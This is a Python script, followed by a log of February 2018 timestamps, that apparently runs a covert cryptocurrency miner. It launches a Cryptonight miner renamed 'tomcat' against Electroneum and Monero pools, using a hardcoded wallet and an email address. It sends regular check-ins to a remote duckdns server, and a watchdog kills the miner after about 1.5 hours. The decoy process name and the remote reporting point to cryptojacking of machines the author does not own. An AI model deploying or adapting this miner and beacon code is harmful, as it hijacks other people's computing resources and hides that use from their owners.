import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:04.362459
#2018-02-17 16:39:06.968946
#2018-02-17 18:27:03.385482
#2018-02-17 20:16:01.586392
#2018-02-17 22:03:05.853934
#2018-02-17 23:47:05.909217
#2018-02-18 01:38:07.419681
#2018-02-18 03:25:05.692767
#2018-02-18 05:13:04.586568
#2018-02-18 07:05:06.967689
#2018-02-18 08:53:05.752234
#2018-02-18 10:40:08.311496
#2018-02-18 12:25:06.949691
#2018-02-18 14:13:04.399181
#2018-02-18 16:03:06.091216
#2018-02-18 17:51:07.159932
#2018-02-18 19:38:03.650987
#2018-02-18 21:23:07.041136
#2018-02-18 23:12:05.348123
#2018-02-19 00:58:03.266649
#2018-02-19 02:46:05.402283
#2018-02-19 04:32:02.026066
#2018-02-19 06:17:03.652685
#2018-02-19 08:05:07.624627
#2018-02-19 09:55:07.775699
#2018-02-19 11:44:07.338814
#2018-02-19 13:31:07.077023
#2018-02-19 15:21:07.808717
#2018-02-19 17:09:05.403524
#2018-02-19 18:54:01.930019
#2018-02-19 20:42:03.907890
#2018-02-19 22:28:03.866852
#2018-02-20 00:14:06.392967
#2018-02-20 02:01:07.186678
#2018-02-20 03:51:05.523825
#2018-02-20 05:35:05.941528
#2018-02-20 07:19:07.555618
#2018-02-20 09:05:09.942824
#2018-02-20 10:48:06.098516
#2018-02-20 12:35:06.248564
#2018-02-20 14:20:11.471539
#2018-02-20 16:03:07.762002
#2018-02-20 17:49:04.495081
#2018-02-20 19:34:05.160000
#2018-02-20 21:20:04.201922
#2018-02-20 23:04:06.931611
#2018-02-21 00:47:05.653644
#2018-02-21 02:31:07.841902
#2018-02-21 04:21:05.554352
#2018-02-21 06:08:03.427980
#2018-02-21 07:54:05.532678
#2018-02-21 09:39:06.719788
#2018-02-21 11:28:04.778767
#2018-02-21 13:17:06.561712
#2018-02-21 15:02:08.564031
#2018-02-21 16:51:01.655565
#2018-02-21 18:39:07.377810
#2018-02-21 20:24:02.078643
#2018-02-21 22:11:03.969957
#2018-02-21 23:59:05.212539
#2018-02-22 01:47:05.996037
#2018-02-22 03:35:06.929075
#2018-02-22 05:21:07.167333
#2018-02-22 07:05:05.647412
#2018-02-22 08:51:04.243117
#2018-02-22 10:39:07.966156
#2018-02-22 12:25:08.655161
#2018-02-22 14:09:08.058963
#2018-02-22 15:56:07.614833
#2018-02-22 17:44:04.144853
#2018-02-22 19:31:05.038270
#2018-02-22 21:23:02.109214
#2018-02-22 23:07:07.189003
#2018-02-23 00:53:08.010044
#2018-02-23 02:40:05.714520
#2018-02-23 04:29:07.299922
#2018-02-23 06:16:04.810699
#2018-02-23 08:02:08.643315
#2018-02-23 10:17:03.411889
#2018-02-23 12:06:06.465849
#2018-02-23 13:53:09.686359
#2018-02-23 15:44:10.885469
#2018-02-23 17:30:08.937269
#2018-02-23 19:17:06.725552
#2018-02-23 21:01:05.990363
#2018-02-23 22:47:07.607714
#2018-02-24 00:36:06.225200
#2018-02-24 02:25:08.893029
#2018-02-24 04:17:08.085812
#2018-02-24 06:06:04.038152
#2018-02-24 07:53:06.324652
#2018-02-24 09:39:01.786845
#2018-02-24 11:34:05.818285
#2018-02-24 13:24:04.496767
#2018-02-24 15:13:05.748196
#2018-02-24 17:02:07.419610
#2018-02-24 18:51:07.573849
#2018-02-24 20:40:09.105405
#2018-02-24 22:49:01.463243
#2018-02-25 02:10:06.146429
#2018-02-25 05:56:07.347116
#2018-02-25 11:38:06.056932